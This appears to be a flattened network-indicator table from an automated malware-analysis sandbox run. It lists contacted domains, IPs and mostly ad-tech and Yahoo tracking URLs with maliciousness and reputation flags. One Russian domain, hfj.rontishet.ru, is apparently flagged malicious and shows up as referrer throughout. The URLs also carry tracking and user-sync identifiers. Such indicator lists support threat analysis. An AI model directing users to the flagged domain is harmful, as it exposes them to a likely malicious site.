                                                                                                                                                      sync.ipredictive.com
                                                                                                                                                      54.157.169.38
                                                                                                                                                      truefalse
                                                                                                                                                        unknown
                                                                                                                                                        wnsrvbjmeprtfrnfx.ay.delivery
                                                                                                                                                        172.67.149.20
                                                                                                                                                        truefalse
                                                                                                                                                          unknown
                                                                                                                                                          prod-rotation-v2.guce.aws.oath.cloud
                                                                                                                                                          52.31.79.192
                                                                                                                                                          truefalse
                                                                                                                                                            unknown
                                                                                                                                                            s.amazon-adsystem.com
                                                                                                                                                            98.82.154.76
                                                                                                                                                            truefalse
                                                                                                                                                              unknown
                                                                                                                                                              aax-eu.amazon-adsystem.com
                                                                                                                                                              52.95.126.160
                                                                                                                                                              truefalse
                                                                                                                                                                unknown
                                                                                                                                                                ipac.ctnsnet.com
                                                                                                                                                                35.186.193.173
                                                                                                                                                                truefalse
                                                                                                                                                                  unknown
                                                                                                                                                                  trace.mediago.io
                                                                                                                                                                  35.208.249.213
                                                                                                                                                                  truefalse
                                                                                                                                                                    unknown
                                                                                                                                                                    geo-atsv2.media.g03.yahoodns.net
                                                                                                                                                                    188.125.72.139
                                                                                                                                                                    truefalse
                                                                                                                                                                      unknown
                                                                                                                                                                      ssp-sync.nl3.vip.prod.criteo.com
                                                                                                                                                                      178.250.1.7
                                                                                                                                                                      truefalse
                                                                                                                                                                        unknown
                                                                                                                                                                        outspot2-ams.adx.opera.com
                                                                                                                                                                        82.145.213.8
                                                                                                                                                                        truefalse
                                                                                                                                                                          unknown
                                                                                                                                                                          match.adsby.bidtheatre.com
                                                                                                                                                                          64.227.64.62
                                                                                                                                                                          truefalse
                                                                                                                                                                            unknown
                                                                                                                                                                            aws-bid-global.ybp.gysm.yahoodns.net
                                                                                                                                                                            54.154.153.241
                                                                                                                                                                            truefalse
                                                                                                                                                                              unknown
                                                                                                                                                                              ib.anycast.adnxs.com
                                                                                                                                                                              185.89.210.244
                                                                                                                                                                              truefalse
                                                                                                                                                                                unknown
                                                                                                                                                                                dsp.nrich.ai
                                                                                                                                                                                51.68.39.188
                                                                                                                                                                                truefalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  edge.gycpi.b.yahoodns.net
                                                                                                                                                                                  87.248.119.252
                                                                                                                                                                                  truefalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    matching.truffle.bid
                                                                                                                                                                                    162.55.120.196
                                                                                                                                                                                    truefalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      uipus.semasio.net
                                                                                                                                                                                      50.57.31.206
                                                                                                                                                                                      truefalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        hfj.rontishet.ru
                                                                                                                                                                                        172.67.147.215
                                                                                                                                                                                        truetrue
                                                                                                                                                                                          unknown
                                                                                                                                                                                          d1r2bc6e8cjv9q.cloudfront.net
                                                                                                                                                                                          13.35.58.32
                                                                                                                                                                                          truefalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            csm.nl3.vip.prod.criteo.net
                                                                                                                                                                                            178.250.1.25
                                                                                                                                                                                            truefalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              ht4hkoldfwqkuse7qoti8nr4vfbfcgkyagnd3phsgq5swccnhjjxv.hocklahro.ru
                                                                                                                                                                                              104.21.93.96
                                                                                                                                                                                              truefalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                ws.rqtrk.eu
                                                                                                                                                                                                57.129.18.113
                                                                                                                                                                                                truefalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  eu-eb2.3lift.com
                                                                                                                                                                                                  76.223.111.18
                                                                                                                                                                                                  truefalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    hbopenbid-ams.pubmnet.com
                                                                                                                                                                                                    185.64.189.112
                                                                                                                                                                                                    truefalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      livepixel-production.bln.liveintent.com
                                                                                                                                                                                                      54.237.79.162
                                                                                                                                                                                                      truefalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        me-ycpi-cf-www.g06.yahoodns.net
                                                                                                                                                                                                        87.248.119.252
                                                                                                                                                                                                        truefalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                          https://sync.intentiq.com/profiles_engine/ProfilesEngineServlet?at=20&mi=10&dpi=793790479&3rddpi=1725065545&3rdpcid=M1PA0VVQ-I-EWH1false
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://geo.yahoo.com/p?s=2023538075&t=J9YHVc7Lx7XH0d5E,0.2836649901694772&_I=&_AO=0&_NOL=0&_R=https%3A%2F%2Fhfj.rontishet.ru%2F&_P=3.54.3%05_a1s%03d%3DAQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA%26S%3DAQAAAtFHlIsUsTVNy2XXUR1j0uw%04_pl%031%04A_v%033.54.3%04A_cn%03ANALYTICS-VERSIONED-PROD%04test%03900%2Cseamless%04_bt%03rapid%04A_pr%03https%04A_tzoff%03-4%04A_sid%03PkFpySMy8UR4yGbo%04_w%03www.yahoo.com%2F%04_rid%031pa4ckpjflnfm%04abk%03%04colo%03bf1%04mrkt%03us%04p_sec%03default%04partner%03none%04site%03fp%04uh_vw%030%04pt%03home%04navtype%03server%04ver%03megastrm%04version%03US%04uloc%03AAEBAQJERQIEAMK5AwMEACWF6wQEAMAZHgUEAXjomwcEACPSRwgEAWVv0Q%04etrg%03show%04outcm%03window%04usergenf%031%04etag%03dwell%2Cstart%04A_jse%03document.visibilitychange%04A_prets%031727716946%04A_prems%03093%04_E%03dwell%04_ts%031727716947%04_ms%03693%04A_sr%031280x1024%04A_vr%031280x984%04A_do%031%04A_ib%031280x907%04A_ob%031280x984%04A_srr%031false
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://dis.criteo.com/dis/usersync.aspx?r=6&p=70&cp=Rubicon&cu=1&url=https%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D6434%26nid%3D2149%26put%3D%40%40CRITEO_USERID%40%40&gdpr=0&us_privacy=1YNNfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://ups.analytics.yahoo.com/ups/58699/cms?partner_id=SEMAS&orig=ono&sInitiator=externalfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://geo.yahoo.com/p?s=2023538075&t=JTNYzsFdGp0Y4lq8,0.21433577355758548&_I=&_AO=0&_NOL=0&_R=https%3A%2F%2Fhfj.rontishet.ru%2F&_P=3.54.3%05_a1s%03d%3DAQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA%26S%3DAQAAAtFHlIsUsTVNy2XXUR1j0uw%04_pl%031%04A_v%033.54.3%04A_cn%03ANALYTICS-VERSIONED-PROD%04test%03900%2Cseamless%04_bt%03rapid%04A_pr%03https%04A_tzoff%03-4%04A_sid%03PkFpySMy8UR4yGbo%04_w%03www.yahoo.com%2F%04_rid%031pa4ckpjflnfm%04abk%03%04colo%03bf1%04mrkt%03us%04p_sec%03default%04partner%03none%04site%03fp%04uh_vw%030%04pt%03home%04navtype%03server%04ver%03megastrm%04version%03US%04uloc%03AAEBAQJERQIEAMK5AwMEACWF6wQEAMAZHgUEAXjomwcEACPSRwgEAWVv0Q%04etrg%03show%04outcm%03window%04usergenf%031%04etag%03dwell%2Cstart%04A_jse%03window.focus%04A_prets%031727716876%04A_prems%03199%04_E%03dwell%04_ts%031727716884%04_ms%03091%04A_sr%031280x1024%04A_vr%031280x984%04A_do%031%04A_ib%031280x907%04A_ob%031280x984%04A_srr%031false
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://finance.yahoo.com/assets/_app/immutable/chunks/chevron_right.Cz_AJ_iF.jsfalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      https://ups.analytics.yahoo.com/ups/58824/sync?format=json&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNNfalse
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        https://www.yahoo.com/px.gif?ch=2&rn=1.7387329119779311false
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://match.adsrvr.org/track/cmf/generic?ttd_pid=gumgum&ttd_tpi=1&gdpr=0&gdpr_consent=false
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://s.yimg.com/ss/analytics-3.57.2.jsfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://ib.adnxs.com/getuid?https%3A%2F%2Fevents-ssc.33across.com%2Fmatch%3Fliv%3Dh%26us_privacy%3D%26bidder_id%3D90%26external_user_id%3D%24UIDfalse
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://finance.yahoo.com/assets/_app/immutable/assets/Debug.SsTdzNxF.cssfalse
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://ssum.casalemedia.com/usermatchredir?s=191503&gdpr=0&gdpr_consent=&us_privacy=1YNN&cb=https%3A%2F%2Fsync.a-mo.net%2Fsetuid%3FA%3D85b2d118-423d-4245-b001-a881df171c6a%26bidder%3Dindex_rtb%26uid%3Dfalse
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://aax-eu.amazon-adsystem.com/s/ecm3?ex=rubiconprojectHMT&id=sNdyC1HQTn6mIhfgSmmsHw&gdpr=0false
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      https://finance.yahoo.com/assets/_app/immutable/assets/TopicPill.Cd876vvj.cssfalse
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        https://finance.yahoo.com/assets/_app/immutable/chunks/delete.BAHk4Xry.jsfalse
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          https://dsp.360yield.com/ul_cb/dsp_match/275?ssp=76&gdpr=0&gdpr_consent=&r=https://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM3MzUmdGw9MTI5NjAw&piggybackCookie=%7BDSP_USER_ID%7Dfalse
                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                            https://finance.yahoo.com/assets/_app/immutable/chunks/toast.DmgsWY65.jsfalse
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              https://pbs.yahoo.com/setuid?bidder=medianet&uid=3707184966390587000V10&gdpr=0&gdpr_consent=&f=bfalse
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                https://finance.yahoo.com/assets/_app/immutable/chunks/utils.CNaWwYSx.jsfalse
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  https://eb2.3lift.com/getuid?gdpr=0&cmp_cs=&us_privacy=&redir=https%3A%2F%2Fssc-cms.33across.com%2Fps%2F%3Fus_privacy%3D%26xi%3D33%26xu%3D%24UIDfalse
                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                    https://geo.yahoo.com/p?s=2023538075&t=Ws1Lf0vGic36e8Az,0.7301232107657194&_I=&_AO=0&_NOL=0&_R=https%3A%2F%2Fhfj.rontishet.ru%2F&_P=3.54.3%05_a1s%03d%3DAQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA%26S%3DAQAAAtFHlIsUsTVNy2XXUR1j0uw%04_pl%031%04A_v%033.54.3%04A_cn%03ANALYTICS-VERSIONED-PROD%04test%03900%2Cseamless%04_bt%03rapid%04A_pr%03https%04A_tzoff%03-4%04A_sid%03PkFpySMy8UR4yGbo%04_w%03www.yahoo.com%2F%04_rid%031pa4ckpjflnfm%04abk%03%04colo%03bf1%04mrkt%03us%04p_sec%03default%04partner%03none%04site%03fp%04uh_vw%030%04pt%03home%04navtype%03server%04ver%03megastrm%04version%03US%04uloc%03AAEBAQJERQIEAMK5AwMEACWF6wQEAMAZHgUEAXjomwcEACPSRwgEAWVv0Q%04etrg%03hide%04outcm%03window%04usergenf%031%04etag%03dwell%2Cstop%04A_jse%03document.visibilitychange%04A_prets%031727716900%04A_prems%03558%04_E%03dwell%04_ts%031727716900%04_ms%03604%04A_sr%031280x1024%04A_vr%031280x984%04A_do%031%04A_ib%031280x907%04A_ob%031280x984%04A_srr%031false
                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                      https://image4.pubmatic.com/AdServer/SPug?partnerID=156078&xid=y-f0.sVSJE2uVI5ED_YoEBZNASsthNxCI-~A&gdpr=0false
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        https://s.yimg.com/cv/apiv2/finance/fonts/GT-America-Condensed-Bold.woff2false
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          https://geo.yahoo.com/p?s=2023538075&t=1727716887698&_I=&_AO=0&_NOL=0&etag=performance&etrg=backgroundPost&outcm=performance&usergenf=0&src=unknown&site=fp&partner=none&lang=en-US&region=US&device=desktop&colo=bf1&test=900%2Cseamless&rid=1pa4ckpjflnfm&pd=unknown&pt=home&ver=megastrm&pl1=2.1.123&pl2=8.51.0&pl3=2.0.27&usercountry=US&sec=top_right&A_utm=%7B%22BENJI_START%22%3A7210%2C%22GPT_READY%22%3A10370%2C%22PREBID_READY%22%3A19191%2C%22PREBID_AUCTION_START%22%3A19272%2C%22GAM_FETCH%22%3A22139%2C%22GAM_RENDER_START%22%3A25267%2C%22GAM_RENDER_END%22%3A34948%7Dfalse
                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                            https://image6.pubmatic.com/AdServer/PugMaster?sec=1&async=1&kdntuid=1&rnd=84124453&p=0&s=0&a=0&ptask=ALL&np=0&fp=0&rp=0&mpc=0&spug=1&coppa=0&gdpr=0&gdpr_consent=&us_privacy=1YNNfalse
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              https://pr-bh.ybp.yahoo.com/sync/iponweb?bidswitch_ssp_id=fmx&ssp_user_id=1284f082-a34a-4d81-a5c6-f9d567101565&gdpr=0&gdpr_consent=false
                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                https://id.rlcdn.com/709996.giffalse
                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                  https://finance.yahoo.com/assets/_app/immutable/chunks/Spinner.D9ew0_W4.jsfalse
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    https://sync.targeting.unrulymedia.com/csync/RX-3fef85e6-bbf0-409a-a376-6c1ad497756a-003?redir=https%3A%2F%2Fads.yieldmo.com%2Fv000%2Fsync%3Fpn_id%3Dunl%26id%3DRX-3fef85e6-bbf0-409a-a376-6c1ad497756a-003false
                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                      https://us-u.openx.net/w/1.0/sd?id=537072977&val=09d30887-12fe-4c92-8e9e-142d6fd8953f-66fade19-5553&gdpr=0&gdpr_consent=false
                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                        https://geo.yahoo.com/p?s=2023538075&t=mzqNaDEtYjKzKRs8,0.3911019130477402&_I=&_AO=0&_NOL=0&_R=https%3A%2F%2Fhfj.rontishet.ru%2F&_P=3.54.3%05_a1s%03d%3DAQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA%26S%3DAQAAAtFHlIsUsTVNy2XXUR1j0uw%04_pl%031%04A_v%033.54.3%04A_cn%03ANALYTICS-VERSIONED-PROD%04test%03900%2Cseamless%04_bt%03rapid%04A_pr%03https%04A_tzoff%03-4%04A_sid%03PkFpySMy8UR4yGbo%04_w%03www.yahoo.com%2F%04_rid%031pa4ckpjflnfm%04abk%03%04colo%03bf1%04mrkt%03us%04p_sec%03default%04partner%03none%04site%03fp%04uh_vw%030%04pt%03home%04navtype%03server%04ver%03megastrm%04version%03US%04uloc%03AAEBAQJERQIEAMK5AwMEACWF6wQEAMAZHgUEAXjomwcEACPSRwgEAWVv0Q%04etrg%03show%04outcm%03window%04usergenf%031%04etag%03dwell%2Cstart%04A_jse%03document.visibilitychange%04A_prets%031727716943%04A_prems%03453%04_E%03dwell%04_ts%031727716943%04_ms%03543%04A_sr%031280x1024%04A_vr%031280x984%04A_do%031%04A_ib%031280x907%04A_ob%031280x984%04A_srr%031false
                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                          https://geo.yahoo.com/p?s=2023538075&t=MX08TRk5FO4hIuxG,0.21963459911718575&_I=&_AO=0&_NOL=0&_R=https%3A%2F%2Fhfj.rontishet.ru%2F&_P=3.54.3%05_a1s%03d%3DAQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA%26S%3DAQAAAtFHlIsUsTVNy2XXUR1j0uw%04_pl%031%04A_v%033.54.3%04A_cn%03ANALYTICS-VERSIONED-PROD%04test%03900%2Cseamless%04_bt%03rapid%04A_pr%03https%04A_tzoff%03-4%04A_sid%03PkFpySMy8UR4yGbo%04_w%03www.yahoo.com%2F%04_rid%031pa4ckpjflnfm%04abk%03%04colo%03bf1%04mrkt%03us%04p_sec%03default%04partner%03none%04site%03fp%04uh_vw%030%04pt%03home%04navtype%03server%04ver%03megastrm%04version%03US%04uloc%03AAEBAQJERQIEAMK5AwMEACWF6wQEAMAZHgUEAXjomwcEACPSRwgEAWVv0Q%04etrg%03hide%04outcm%03window%04usergenf%031%04etag%03dwell%2Cstop%04A_jse%03document.visibilitychange%04A_prets%031727716894%04A_prems%03975%04_E%03dwell%04_ts%031727716895%04_ms%03648%04A_sr%031280x1024%04A_vr%031280x984%04A_do%031%04A_ib%031280x907%04A_ob%031280x984%04A_srr%031false
                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                            https://image2.pubmatic.com/AdServer/Pug?gdpr=0&vcode=bz0yJnR5cGU9MSZjb2RlPTExMTMmdGw9NDMyMDA=&piggybackCookie=ssIpHeCRfh2pkn9FsJdiH-CWKkqpw3YZvMx4xhclfalse
                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                              https://finance.yahoo.com/assets/_app/immutable/assets/Tooltip.IRw8ojlh.cssfalse
                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                https://pbs.yahoo.com/setuid?bidder=criteo&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1&f=i&uid=k-3SgYYRgO8KCVcYjD__uE9zQxVc6YWccgVj7zOgfalse
                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                  https://s.yimg.com/uu/api/res/1.2/f3GRHZeRABNpJiPbHs4McA--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/wwd_409/a6afc674d9b56b0fa8f0f824d671500c.cf.webpfalse
                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                    https://u.openx.net/w/1.0/pd?cc=1&gdpr=0&gdpr_consent=&us_privacy=1YNN&ph=2d1251ae-7f3a-47cf-bd2a-2f288854a0bafalse
                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                      https://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTE5NjkmdGw9MTI5NjAw&piggybackCookie=09d30887-12fe-4c92-8e9e-142d6fd8953f-66fade19-5553&gdpr=0&gdpr_consent=false
                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                        https://sync.1rx.io/usersync2/pubmatic&gdpr=0&gdpr_consent=false
                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                          https://geo.yahoo.com/p?s=2023538075&t=xLOsoDosTUySldvR,0.43681323017399576&_I=&_AO=0&_NOL=0&_R=https%3A%2F%2Fhfj.rontishet.ru%2F&_P=3.54.3%05_a1s%03d%3DAQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA%26S%3DAQAAAtFHlIsUsTVNy2XXUR1j0uw%04_pl%031%04A_v%033.54.3%04A_cn%03ANALYTICS-VERSIONED-PROD%04test%03900%2Cseamless%04_bt%03rapid%04A_pr%03https%04A_tzoff%03-4%04A_sid%03PkFpySMy8UR4yGbo%04_w%03www.yahoo.com%2F%04_rid%031pa4ckpjflnfm%04abk%03%04colo%03bf1%04mrkt%03us%04p_sec%03default%04partner%03none%04site%03fp%04uh_vw%030%04pt%03home%04navtype%03server%04ver%03megastrm%04version%03US%04uloc%03AAEBAQJERQIEAMK5AwMEACWF6wQEAMAZHgUEAXjomwcEACPSRwgEAWVv0Q%04etrg%03hide%04outcm%03window%04usergenf%031%04etag%03dwell%2Cstop%04A_jse%03document.visibilitychange%04A_prets%031727716945%04A_prems%03883%04_E%03dwell%04_ts%031727716946%04_ms%03093%04A_sr%031280x1024%04A_vr%031280x984%04A_do%031%04A_ib%031280x907%04A_ob%031280x984%04A_srr%031false
                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                            https://s.yimg.com/aaq/nel/css/spotIm.SpotImJACForQSP.atomic.ltr.5c12e46d3b7a53aff9d869c8059a7f56.min.cssfalse
                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                              https://finance.yahoo.com/assets/_app/immutable/assets/Typography.CaSb88v6.cssfalse
                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                https://sync.srv.stackadapt.com/sync?nid=1&gdpr=0&gdpr_consent=false
                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                  https://ups.analytics.yahoo.com/ups/58739/cms?partner_id=BLKAI&orig=onofalse
                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                    https://finance.yahoo.com/assets/_app/immutable/chunks/Ads.t43t7gLT.jsfalse
                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                      https://s.yimg.com/aaq/vzm/cs_1.6.6.jsfalse
                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                        https://pixel-eu.onaudience.com/?partner=270&smartmap=1&gdpr=0&gdpr_consent=&redirect=image2.pubmatic.com%2FAdServer%2FPug%3Fvcode%3Dbz0yJnR5cGU9MSZjb2RlPTI4ODQmdGw9MTI5NjAw%26piggybackCookie%3D%25_rid%26gdpr%3D0%26gdpr_consent%3D%25_gdpr_consentfalse
                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                          https://images.taboola.com/taboola/image/fetch/c_crop%2Cf_jpg%2Cq_auto%2Ce_sharpen%2Car_1.9100%2Cw_1200%2Cx_0%2Cy_11/c_fill%2Cw_340%2Ch_179/http%3A//cdn.taboola.com/libtrc/static/thumbnails/9cc49da8e6bbb68a4a886a5bc8ac7872.pngfalse
                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                            https://s.yimg.com/uu/api/res/1.2/d2s6nYW_YMTX2VM1IGOKBQ--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/the_hill_articles_341/05f082c3610c0f639765aa4d2e67e189.cf.webpfalse
                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                              https://s.yimg.com/uu/api/res/1.2/BdrXtbFtdHZFBGTr4iYGaQ--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2021-01/8fcd9e10-4e8b-11eb-9fdf-5bd1b68e439b.cf.webpfalse
                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                https://finance.yahoo.com/assets/_app/immutable/chunks/server.CGBHKPKz.jsfalse
                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                  https://cds.taboola.com/?uid=27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380&ptf=V2luZG93cw==&ptfv=MTAuMC4w&ufv=MTE3LjAuNTkzOC4xMzI=&bnd=R29vZ2xlIENocm9tZQ==&bndv=MTE3&bnd=Tm90O0E9QnJhbmQ=&bndv=OA==&bnd=Q2hyb21pdW0=&bndv=MTE3&mbl=ZmFsc2U=false
                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                    https://geo.yahoo.com/p?s=2023538075&t=dt9GR26mS9Mtx0kc,0.9451980510869105&_I=&_AO=0&_NOL=0&_R=https%3A%2F%2Fhfj.rontishet.ru%2F&_P=3.54.3%05_a1s%03d%3DAQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA%26S%3DAQAAAtFHlIsUsTVNy2XXUR1j0uw%04_pl%031%04A_v%033.54.3%04A_cn%03ANALYTICS-VERSIONED-PROD%04test%03900%2Cseamless%04_bt%03rapid%04A_pr%03https%04A_tzoff%03-4%04A_sid%03PkFpySMy8UR4yGbo%04_w%03www.yahoo.com%2F%04_rid%031pa4ckpjflnfm%04abk%03%04colo%03bf1%04mrkt%03us%04p_sec%03default%04partner%03none%04site%03fp%04uh_vw%030%04pt%03home%04navtype%03server%04ver%03megastrm%04version%03US%04uloc%03AAEBAQJERQIEAMK5AwMEACWF6wQEAMAZHgUEAXjomwcEACPSRwgEAWVv0Q%04etrg%03hide%04outcm%03window%04usergenf%031%04etag%03dwell%2Cstop%04A_jse%03document.visibilitychange%04A_prets%031727716903%04A_prems%03625%04_E%03dwell%04_ts%031727716903%04_ms%03656%04A_sr%031280x1024%04A_vr%031280x984%04A_do%031%04A_ib%031280x907%04A_ob%031280x984%04A_srr%031false
                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                      https://geo.yahoo.com/p?s=2023538075&t=lIUAoYemQRzotwxm,0.745448306506062&_I=&_AO=0&_NOL=0&_R=https%3A%2F%2Fhfj.rontishet.ru%2F&_P=3.54.3%05_a1s%03d%3DAQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA%26S%3DAQAAAtFHlIsUsTVNy2XXUR1j0uw%04_pl%031%04A_v%033.54.3%04A_cn%03ANALYTICS-VERSIONED-PROD%04test%03900%2Cseamless%04_bt%03rapid%04A_pr%03https%04A_tzoff%03-4%04A_sid%03PkFpySMy8UR4yGbo%04_w%03www.yahoo.com%2F%04_rid%031pa4ckpjflnfm%04abk%03%04colo%03bf1%04mrkt%03us%04p_sec%03default%04partner%03none%04site%03fp%04uh_vw%030%04pt%03home%04navtype%03server%04ver%03megastrm%04version%03US%04uloc%03AAEBAQJERQIEAMK5AwMEACWF6wQEAMAZHgUEAXjomwcEACPSRwgEAWVv0Q%04etrg%03hide%04outcm%03window%04usergenf%031%04etag%03dwell%2Cstop%04A_jse%03document.visibilitychange%04A_prets%031727716899%04A_prems%03452%04_E%03dwell%04_ts%031727716900%04_ms%03230%04A_sr%031280x1024%04A_vr%031280x984%04A_do%031%04A_ib%031280x907%04A_ob%031280x984%04A_srr%031false
                                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                                        https://geo.yahoo.com/p?s=2023538075&t=cRqOe5Vj95DuYuHx,0.5658117746866935&_I=&_AO=0&_NOL=0&_R=https%3A%2F%2Fhfj.rontishet.ru%2F&_P=3.54.3%05_a1s%03d%3DAQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA%26S%3DAQAAAtFHlIsUsTVNy2XXUR1j0uw%04_pl%031%04A_v%033.54.3%04A_cn%03ANALYTICS-VERSIONED-PROD%04test%03900%2Cseamless%04_bt%03rapid%04A_pr%03https%04A_tzoff%03-4%04A_sid%03PkFpySMy8UR4yGbo%04_w%03www.yahoo.com%2F%04_rid%031pa4ckpjflnfm%04abk%03%04colo%03bf1%04mrkt%03us%04p_sec%03default%04partner%03none%04site%03fp%04uh_vw%030%04pt%03home%04navtype%03server%04ver%03megastrm%04version%03US%04uloc%03AAEBAQJERQIEAMK5AwMEACWF6wQEAMAZHgUEAXjomwcEACPSRwgEAWVv0Q%04etrg%03show%04outcm%03window%04usergenf%031%04etag%03dwell%2Cstart%04A_jse%03document.visibilitychange%04A_prets%031727716891%04A_prems%03112%04_E%03dwell%04_ts%031727716891%04_ms%03252%04A_sr%031280x1024%04A_vr%031280x984%04A_do%031%04A_ib%031280x907%04A_ob%031280x984%04A_srr%031false
                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                          https://finance.yahoo.com/assets/_app/immutable/chunks/LeafNewsStream.fbxy526h.jsfalse
                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                            https://finance.yahoo.com/assets/_app/immutable/chunks/Icon.C8w5V9EK.jsfalse
                                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                                              https://s.yimg.com/aaq/wf/wf-benji-1.2.0-modern.jsfalse
                                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                                https://cm.g.doubleclick.net/pixel?google_nid=open&google_hm=Voyxcemfgzm4YzUXwcwn_Q==&ox_sc=1&ox_init=1false
                                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                                  https://image2.pubmatic.com/AdServer/Pug?gdpr=0&vcode=bz0yJnR5cGU9MSZjb2RlPTExMTMmdGw9NDMyMDA=&piggybackCookie=9aAD_6fzVPzurgOs-qFI_6fwUv3uoVOvoq9QUrmyfalse
                                                                                                                                                                                                                                                                                                                                    unknown
